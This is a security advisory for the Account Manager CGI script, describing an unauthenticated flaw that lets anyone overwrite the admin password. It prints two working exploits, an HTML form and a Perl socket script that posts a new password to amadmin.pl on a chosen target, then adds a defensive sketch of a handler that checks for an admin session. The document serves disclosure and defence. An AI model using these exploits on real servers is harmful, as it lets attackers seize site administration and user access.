COMMAND

    Account Manager CGI

SYSTEMS AFFECTED

    ALL, including LITE and PRO (haven't been able to test ENTERPRISE)

PROBLEM

    'n30' found the following.  The script allows any remote user
    access to the Administration Control Panel by overwriting the Admin
    Password with one of their own making.  This is possible because
    the script parses the submitted data with total disregard for
    whether the current user has Admin privileges.  Therefore calling

        www.server.com/cgibin/amadmin.pl?setpasswd

    using a POST command would allow the password to be altered.

    Using this exploit would give a remote user access to add and
    remove users from protected areas of your website, and perhaps
    access to other more interesting CGIs.

    Here comes the exploit:

    <FORM ACTION="http://www.decodeco.com/cgi-bin/acctman/amadmin.pl" METHOD="POST"><CENTER><BR>
    <TABLE BORDER="0" WIDTH="450"><TBODY><COLDEFS><COLDEF></COLDEFS><ROWS><TR><TD
    COLSTART="1"><P><B><FONT FACE="verdana, arial, helvetica"><FONT
    COLOR="#FF0000">Account Manager LITE/PRO</FONT>:  Password Exploit!</FONT></B></P>
    <CENTER><FONT FACE="verdana, arial, helvetica"><FONTCOLOR="#FF0000">n30</FONT></B></P></CENTER>
    <P><FONT SIZE="-1" FACE="verdana, arial, helvetica">Please enter your password twice.  Once to set it, and once to confirm it.</FONT></P>
    <CENTER><TABLE BORDER="0"><TBODY><COLDEFS><COLDEF><COLDEF></COLDEFS><ROWS><TR
    ><TD ALIGN="RIGHT" COLSTART="1"><INPUT TYPE="PASSWORD" NAME="pwd"></TD><TD
    COLSTART="2"><FONT SIZE="-2" FACE="verdana, arial, helvetica">password</FONT></TD></TR>
    <TR><TD ALIGN="RIGHT" COLSTART="1"><INPUT TYPE="PASSWORD" NAME="pwd2"></TD><TD
    COLSTART="2"><FONT SIZE="-2" FACE="verdana, arial, helvetica">confirmation</FONT></TD></TR>
    <TR><TD ALIGN="CENTER" COLSTART="1"><BR><INPUT
    TYPE="SUBMIT" NAME="setpwd" VALUE="  Set Password  "></TD><TD COLSTART="2"><BR></TD></TR></ROWS></TBODY></TABLE></CENTER><CENTER><TABLE
    BORDER="0" WIDTH="400"><TBODY><COLDEFS><COLDEF></COLDEFS><ROWS><TR><TD
    COLSTART="1"><HR SIZE="1"></TD></TR><TR><TD ALIGN="CENTER" COLSTART="1"><FONT
    SIZE="-2" FACE="verdana, arial, helvetica"><B>Account Manager LITE/PRO Admin Passwerd Exploit
    </B></A></FONT></TD></TR></ROWS></TBODY></TABLE></CENTER></TD></TR></ROWS></TBODY></TABLE></CENTER>
    <CENTER><FONTSIZE="1" FACE="verdana, arial, helvetica"><B><BR> To Use Modify Source To Point to amadmin.pl on TARGET Server <BR><BR><a href="mailto:n30@alldas.de">mail-me</a></CENTER>
    </FORM>
    
    <!-- Shoutz to trib, axess and all who know me! -->

    Here is another:

    #!/usr/bin/perl -w
    
    ## Account Manager LITE 1.0x / cgi.elitehost.com
    ## This exploit lets you change the administrator
    ## password, and completely take control.
    ##
    ## teleh0r@doglover.com / anno 2000
    ## httpd://teleh0r.cjb.net
    
    use strict;
    use Socket;
    
    if (@ARGV < 2) {
        print("Usage: $0 <target> <newpass>\n");
        exit(1);
    }
    
    my($target,$newpass,$crypt,$length,$command,
       $agent,$sploit,$iaddr,$paddr,$proto);
    
    ($target,$newpass) = @ARGV;
    
    $crypt = crypt($newpass, 'aa');
    $length = 34 + length($newpass);
    
    print("\nRemote host: $target\n");
    print("CGI-script: /cgi-bin/subscribe.pl\n");
    print("New password: $newpass / $crypt\n\n");
    
    $command = "pwd=$newpass&pwd2=$newpass&setpwd=++Set+Password++";
    $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";
    
    # Note that POST /cgi-bin/amlite/amadmin.pl HTTP/1.0
    # may have to be changed...
    
    $sploit=
    "POST /cgi-bin/amlite/amadmin.pl HTTP/1.0
    Connection: close
    User-Agent: $agent
    Host: $target
    Content-type: application/x-www-form-urlencoded
    Content-length: $length
    
    $command";
    
    $iaddr = inet_aton($target)                     || die("Error: $!\n");
    $paddr = sockaddr_in(80, $iaddr)                || die("Error: $!\n");
    $proto = getprotobyname('tcp')                  || die("Error: $!\n");
    
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
    connect(SOCKET, $paddr)                         || die("Error: $!\n");
    send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
    close(SOCKET);
    
    sleep(2);
    print("Surf to http://$target/cgi-bin/amlite/amadmin.pl\n");
    exit(0);

SOLUTION

    Already available; see website.  The download version is patched.
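
    The PROBLEM section attributes the flaw to the script acting on
    submitted form data without checking for Admin privileges.  The
    sketch below is an added example, not Account Manager's code and
    not the vendor's patch: it contrasts that handler shape with one
    that requires an admin session and the current password.  All
    names, the session token and the crypt-based storage are
    assumptions.

```perl
#!/usr/bin/perl
# Added illustration; not Account Manager's code. All names are hypothetical.
use strict;
use warnings;

# Constructed state: stored admin hash and the one valid admin session token.
# Assumption: the hash is crypt() output, mirroring the crypt() call in the
# exploit above; a real deployment should use a modern password hash.
my %state = (admin_hash => crypt('original-secret', 'aa'),
             session    => 'constructed-session-token');

# Vulnerable shape described in the advisory: the action runs on form data alone.
sub set_password_unchecked {
    my ($form) = @_;
    return 'mismatch' unless $form->{pwd} eq $form->{pwd2};
    $state{admin_hash} = crypt($form->{pwd}, 'aa');
    return 'changed';
}

# Hardened shape: refuse unless the request proves it comes from the admin.
sub set_password_checked {
    my ($form, $cookie) = @_;
    return 'denied: no admin session'
        unless defined $cookie && $cookie eq $state{session};
    return 'denied: wrong current password'
        unless crypt($form->{oldpwd} // '', $state{admin_hash})
               eq $state{admin_hash};
    return 'mismatch' unless ($form->{pwd} // '') eq ($form->{pwd2} // '');
    $state{admin_hash} = crypt($form->{pwd}, 'aa');
    return 'changed';
}

# Constructed request: the three fields the advisory's form submits, no cookie.
my %anon = (pwd => 'x', pwd2 => 'x', setpwd => '  Set Password  ');
print "checked, anonymous:   ", set_password_checked(\%anon, undef), "\n";
print "checked, admin:       ",
    set_password_checked({ %anon, oldpwd => 'original-secret' },
                         'constructed-session-token'), "\n";
print "unchecked, anonymous: ", set_password_unchecked(\%anon), "\n";
```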